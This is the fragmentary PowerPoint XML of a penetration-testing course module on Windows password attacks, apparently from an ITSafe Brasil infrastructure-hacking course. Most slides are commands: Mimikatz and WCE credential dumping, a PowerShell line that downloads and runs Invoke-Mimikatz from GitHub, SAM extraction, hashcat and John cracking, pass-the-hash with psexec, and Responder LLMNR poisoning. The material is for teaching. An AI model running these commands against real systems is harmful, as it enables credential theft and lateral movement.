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1" r:id="rId5"/>
    <p:sldMasterId id="2147483675" r:id="rId6"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId27"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="287" r:id="rId7"/>
    <p:sldId id="256" r:id="rId8"/>
    <p:sldId id="263" r:id="rId9"/>
    <p:sldId id="262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21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14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4C1495-2471-4C50-8485-27285CF0BF8F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A2AD36-8CFE-4D2A-AD4A-27FC1F680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44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B4CD0-8422-43BE-88C9-B3611DA40501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FCFB9-ADA7-41C3-A4B5-1733C4A02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197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B4CD0-8422-43BE-88C9-B3611DA40501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FCFB9-ADA7-41C3-A4B5-1733C4A02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104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B4CD0-8422-43BE-88C9-B3611DA40501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FCFB9-ADA7-41C3-A4B5-1733C4A02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2899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976" y="0"/>
            <a:ext cx="12197952" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6560147"/>
            <a:ext cx="7639475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ko-KR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맑은 고딕" panose="020B0503020000020004" pitchFamily="34" charset="-127"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hacking de Infraestruturas - ITSafe Brasil</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1333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5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6332824" y="6560147"/>
            <a:ext cx="5859177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Shay </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1333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Alfasi</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1333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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2404412" y="4512734"/>
            <a:ext cx="6858000" cy="135421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Curso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de Hacking para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Infraestruturas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redes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Shay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Alfasi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Tradu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ção: Luli Rosenberg &amp; Helton Wernik</a:t>
            </a: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3341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ABF69-6E84-4DDE-9FC7-873BECAFC96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12/6/2021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DD7A2C-91F1-4004-A171-7F4AB5FF3A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2229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ABF69-6E84-4DDE-9FC7-873BECAFC96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12/6/2021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DD7A2C-91F1-4004-A171-7F4AB5FF3A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47411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ABF69-6E84-4DDE-9FC7-873BECAFC96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12/6/2021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DD7A2C-91F1-4004-A171-7F4AB5FF3A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22668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ABF69-6E84-4DDE-9FC7-873BECAFC96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12/6/2021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DD7A2C-91F1-4004-A171-7F4AB5FF3A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12318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ABF69-6E84-4DDE-9FC7-873BECAFC96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12/6/2021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DD7A2C-91F1-4004-A171-7F4AB5FF3A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455657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ABF69-6E84-4DDE-9FC7-873BECAFC96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12/6/2021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DD7A2C-91F1-4004-A171-7F4AB5FF3A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72052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ABF69-6E84-4DDE-9FC7-873BECAFC96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12/6/2021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DD7A2C-91F1-4004-A171-7F4AB5FF3A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1434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B4CD0-8422-43BE-88C9-B3611DA40501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FCFB9-ADA7-41C3-A4B5-1733C4A02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4775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ABF69-6E84-4DDE-9FC7-873BECAFC96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12/6/2021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DD7A2C-91F1-4004-A171-7F4AB5FF3A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1192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ABF69-6E84-4DDE-9FC7-873BECAFC96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12/6/2021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DD7A2C-91F1-4004-A171-7F4AB5FF3A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15350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ABF69-6E84-4DDE-9FC7-873BECAFC96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12/6/2021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DD7A2C-91F1-4004-A171-7F4AB5FF3A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1895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ABF69-6E84-4DDE-9FC7-873BECAFC96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12/6/2021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DD7A2C-91F1-4004-A171-7F4AB5FF3A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153590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976" y="0"/>
            <a:ext cx="12197952" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6560147"/>
            <a:ext cx="7639475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altLang="ko-KR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맑은 고딕" panose="020B0503020000020004" pitchFamily="34" charset="-127"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>קורס פייתון בהייטק</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1333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5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6332824" y="6560147"/>
            <a:ext cx="5859177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Roman Zaikin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257779583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12192000" cy="1179288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="5333" b="1" u="sng" baseline="0">
                <a:latin typeface="Ariel"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" u="none" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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9600" y="1536701"/>
            <a:ext cx="10972800" cy="452596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rPr lang="en-US" altLang="ko-KR" sz="3733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</p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160765318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1C9DBA-6F7F-4F28-A2D1-A07449E9D1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13D8290-E954-40AB-ACB2-6C737327C8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7F6D5D2-0857-4DD5-9B22-03CECB839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7CE1C-02C1-49E9-9E1C-1FC501B3D41D}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>06/12/2021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FC4ECE9-B3A5-4F76-98B3-AFD967E48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F2CB6F5-8B58-4445-8C22-ABF6BF32A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D507E-073A-43C8-937E-6738627DF52F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254833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B774FD-573B-41B5-80C3-AE2AAA099A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B439214-7DE4-41CE-AF3C-3B861446F6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A857A3C-B97A-4BD3-BAED-20102DE6A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7CE1C-02C1-49E9-9E1C-1FC501B3D41D}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>06/12/2021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C94748C-73A5-4D48-89C5-7223CD56B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1A888B4-6E80-4E4C-B503-B71A9CE0F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D507E-073A-43C8-937E-6738627DF52F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45311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5EEF83-E4D3-45AD-9253-020720A0C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18F645E-E6D0-43EF-81CC-84CCC28352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88BED41-1B46-47D7-99EB-23791FB0E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7CE1C-02C1-49E9-9E1C-1FC501B3D41D}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>06/12/2021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A3C7E70-3897-4347-8DE2-3B3805B00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58C24FD-811E-47D6-834A-32275EE9D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D507E-073A-43C8-937E-6738627DF52F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862305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1C2F85-1098-4505-80D7-36B85DC0A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E282BC-E0B6-4460-A849-CD548FE2B4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04EFEB3-31FF-44CD-BD8E-8499B204C7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358986E-2CC1-41EB-8879-F67CC1A2E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7CE1C-02C1-49E9-9E1C-1FC501B3D41D}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>06/12/2021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F3B96B1-C87C-47D1-A775-9495D6E52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5B2DCE5-818E-4949-B826-4BAFA808B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D507E-073A-43C8-937E-6738627DF52F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8166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B4CD0-8422-43BE-88C9-B3611DA40501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FCFB9-ADA7-41C3-A4B5-1733C4A02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06312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0E6F03-2D40-42B8-BC43-79C4F916B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2B68393-571E-43B8-AEBE-D7E52FC0C8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06B8D20-24E8-4196-A069-07EA7B8DCD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85201404-9FB5-46FA-BFF6-6E5ECC4F01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A8D9FED-0C56-496D-BB89-AA8C821B3B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3BB5218-1265-4AD0-B76E-39D11B3C1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7CE1C-02C1-49E9-9E1C-1FC501B3D41D}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>06/12/2021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ABB244E-2E8E-48E5-B05E-FFD97C9F3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8E4557A7-67F4-4E45-B7CD-770D589B6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D507E-073A-43C8-937E-6738627DF52F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720526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8E0452-B5B0-4E90-B1A0-FCF4F79B1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8830256-B236-46BB-825A-C1EDA8BA9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7CE1C-02C1-49E9-9E1C-1FC501B3D41D}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>06/12/2021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B2522B4-1AC6-46A4-8BC4-567847474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3037CD0-E4D9-464F-A0CB-97466E9D3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D507E-073A-43C8-937E-6738627DF52F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711010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05AED77A-DE8B-4C96-9B46-68858F659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7CE1C-02C1-49E9-9E1C-1FC501B3D41D}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>06/12/2021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4F4048B6-FFB7-40A7-BEE4-3CD50084B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568D19A-97E7-414B-AA3D-E7B44C887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D507E-073A-43C8-937E-6738627DF52F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841867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A918A6-EAC2-41E0-9644-B168B7403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6D33409-F497-43E7-88E0-B4A9F3A1BA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8E701C0-08D5-455A-A38F-93BD643371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60BE289-6E6E-4819-8CDD-FADD92A8D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7CE1C-02C1-49E9-9E1C-1FC501B3D41D}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>06/12/2021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4F7AD3A-9D80-4241-9780-FC9134CFC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7E5470B-C40D-41E7-B0BA-FD81DCCF7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D507E-073A-43C8-937E-6738627DF52F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420939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6FD368-3CD5-487B-A1B0-997BD0CEA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21DF946-2D54-4E3F-AE08-6B6A581FAD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E1569BA-D1CC-44FD-B167-C085057E9B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D149044-06A8-4AF0-A1F5-2C3CC4A86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7CE1C-02C1-49E9-9E1C-1FC501B3D41D}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>06/12/2021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6FAB028-695D-4123-B7E4-EBE7A25EE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3AC5F18-BE32-4584-A7A5-2FAA59F7F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D507E-073A-43C8-937E-6738627DF52F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696276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6753E5-AF20-49A3-94A5-B824E773E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157DE7F-CC1A-412A-B674-62614CBE0F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05A7DFA-3A26-4662-9751-C16CB017B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7CE1C-02C1-49E9-9E1C-1FC501B3D41D}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>06/12/2021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8FF0D5C-BAC9-42AC-A78A-1F31FAFD4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854202A-A0B8-4C1D-A273-F3249D1A6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D507E-073A-43C8-937E-6738627DF52F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161544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4F2A52D-5AEB-458F-9A1C-333099B4E9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C3DDD8C-7C00-4D2F-AA92-C2DACFE90D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115634A-21D6-4577-8661-3B2C0105E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7CE1C-02C1-49E9-9E1C-1FC501B3D41D}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>06/12/2021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0038465-2163-496F-8A4C-3AE4CCA32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3E089EA-5070-486D-AFF2-1D4AF15B0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D507E-073A-43C8-937E-6738627DF52F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7236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B4CD0-8422-43BE-88C9-B3611DA40501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FCFB9-ADA7-41C3-A4B5-1733C4A02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680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B4CD0-8422-43BE-88C9-B3611DA40501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FCFB9-ADA7-41C3-A4B5-1733C4A02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153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B4CD0-8422-43BE-88C9-B3611DA40501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FCFB9-ADA7-41C3-A4B5-1733C4A02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664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B4CD0-8422-43BE-88C9-B3611DA40501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FCFB9-ADA7-41C3-A4B5-1733C4A02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624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B4CD0-8422-43BE-88C9-B3611DA40501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FCFB9-ADA7-41C3-A4B5-1733C4A02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361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B4CD0-8422-43BE-88C9-B3611DA40501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FCFB9-ADA7-41C3-A4B5-1733C4A02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55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hyperlink" Target="http://www.free-powerpoint-templates-design.com/free-powerpoint-templates-design" TargetMode="Externa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B4CD0-8422-43BE-88C9-B3611DA40501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FCFB9-ADA7-41C3-A4B5-1733C4A02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479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ABF69-6E84-4DDE-9FC7-873BECAFC96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12/6/2021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DD7A2C-91F1-4004-A171-7F4AB5FF3A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rgbClr val="09091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>
            <a:hlinkClick r:id="rId15"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6560147"/>
            <a:ext cx="7639475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맑은 고딕" panose="020B0503020000020004" pitchFamily="34" charset="-127"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="pt-BR" altLang="ko-KR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맑은 고딕" panose="020B0503020000020004" pitchFamily="34" charset="-127"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>acking de Infraestruturas - ITSafe Brasil</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1333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6332824" y="6560147"/>
            <a:ext cx="5859177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S</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="pt-BR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hay Alfasi</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1333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7637" y="5405415"/>
            <a:ext cx="1854364" cy="1102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1338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32C72D3-48F1-40DC-AF80-CFF2038BB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B226716-8EA8-44F0-80B5-F2274F5048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6DB83E2-9570-48BE-9B7B-D14DA51AC8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7CE1C-02C1-49E9-9E1C-1FC501B3D41D}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>06/12/2021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10C8E09-4D65-4DF7-9AC8-E17492759C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83B35F5-54F4-430C-82C5-EB3A1702B2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4D507E-073A-43C8-937E-6738627DF52F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966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file:///\\bob" TargetMode="External"/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5561923"/>
            <a:ext cx="12192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맑은 고딕" panose="020B0503020000020004" pitchFamily="34" charset="-127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2880" y="1"/>
            <a:ext cx="2219120" cy="1319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5133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447675"/>
            <a:ext cx="10220325" cy="896938"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Passwords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295" y="1171143"/>
            <a:ext cx="43702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Using Mimikatz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2034251"/>
            <a:ext cx="111981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Download Mimikatz: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https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200308-1/mimikatz_trunk.zip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0" y="3431524"/>
            <a:ext cx="361893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Run as administrator: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privilege::debug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err="1"/>
              <a:t>sekurlsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>logonpasswords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241379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447675"/>
            <a:ext cx="10220325" cy="896938"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Passwords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295" y="1171143"/>
            <a:ext cx="43702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Using WCE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2034251"/>
            <a:ext cx="79617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Download WCE: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https://www.ampliasecurity.com/research/wce_v1_42beta_x64.zip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0" y="3431524"/>
            <a:ext cx="276370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Run as administrator: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Wce.exe -w</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20576626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447675"/>
            <a:ext cx="10220325" cy="896938"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Passwords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295" y="1171143"/>
            <a:ext cx="43702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Mimikatz With Powershell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2034251"/>
            <a:ext cx="1135493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Run from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> as administrator: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powershell.exe -exec bypass -C "IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>DumpCreds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>" &gt; C:\Users\PTBOX\Downloads\pass.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18265044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447675"/>
            <a:ext cx="10220325" cy="896938"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Passwords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295" y="1171143"/>
            <a:ext cx="43702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Sam dump and extract with samdump2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2034251"/>
            <a:ext cx="113549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Sam and System extract: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err="1"/>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> save </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hklm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> c:\sam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err="1"/>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> save </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hklm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>\system c:\system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295" y="3401302"/>
            <a:ext cx="113549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Using samdump2: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samdump2 system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sam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02928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447675"/>
            <a:ext cx="10220325" cy="896938"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Passwords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295" y="1171143"/>
            <a:ext cx="43702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Sam dump and extract with Secretdump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2034251"/>
            <a:ext cx="1135493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Install impacket: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err="1"/>
              <a:t>git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> clone https://github.com/SecureAuthCorp/impacket.git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pip install -r requirements.txt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python3 setup.py install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295" y="4047077"/>
            <a:ext cx="113549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Using secretdump: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python3 secretdump.py -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> [SAM FILE] -system [System FILE] LOCAL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17492515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447675"/>
            <a:ext cx="10220325" cy="896938"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Passwords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295" y="1171143"/>
            <a:ext cx="43702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Password Cracking with Hashcat and John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2034251"/>
            <a:ext cx="113549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Hashcat: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err="1"/>
              <a:t>hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> -m 1000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hashes.lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/share/wordlists/rockyou.txt  --force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295" y="4047077"/>
            <a:ext cx="113549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John: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john --format=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>nt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hashes.lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> --wordlist=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/share/wordlists/rockyou.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1362634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447675"/>
            <a:ext cx="10220325" cy="896938"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Passwords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295" y="1171143"/>
            <a:ext cx="43702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Pass the hash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2034251"/>
            <a:ext cx="113549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Impacket Psexec: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python psexec.py administrator@192.168.1.X -hashes [NTLM HASH]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3431524"/>
            <a:ext cx="1135493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Metasploit Psexec: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use windows/smb/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>psexec_psh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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set smbuser administrator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set smbpass [NTLM HASH]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exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29928119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447675"/>
            <a:ext cx="10220325" cy="896938"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Passwords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295" y="1171143"/>
            <a:ext cx="43702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Responder – Under the hood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2034251"/>
            <a:ext cx="11354937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/>
              <a:t>LLMNR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Link-Local Multicast Name Resolution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For example if we want to get the share folder of the user bob so we can go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>\\bob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and don’t need his ip address.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3772718"/>
            <a:ext cx="113549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Important to remember</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>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b="1" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> requests are made as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Unicast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b="1" dirty="0"/>
              <a:t>LLMNR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> requests are made as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Multicast</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41041994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447675"/>
            <a:ext cx="10220325" cy="896938"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Passwords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295" y="1171143"/>
            <a:ext cx="4872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Responder – Under the hood – LLMNR Poisoning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8424" y="1890290"/>
            <a:ext cx="9243658" cy="4276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1295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447675"/>
            <a:ext cx="10220325" cy="896938"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Passwords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295" y="1171143"/>
            <a:ext cx="4872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Responder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295" y="2068003"/>
            <a:ext cx="25730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Listen with responder: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responder -I eth0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295" y="3241862"/>
            <a:ext cx="37328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Responder logs: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cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/share/responder/logs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295" y="4718095"/>
            <a:ext cx="70640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Crack NTLMv2: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hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -m 5600 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hash.lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/share/wordlists/rockyou.txt --force</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4236912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2262433" y="2395537"/>
            <a:ext cx="7534275" cy="103346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Passwords - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Senhas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9424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389004" y="942287"/>
            <a:ext cx="7834312" cy="896938"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>Parabéns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>você</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
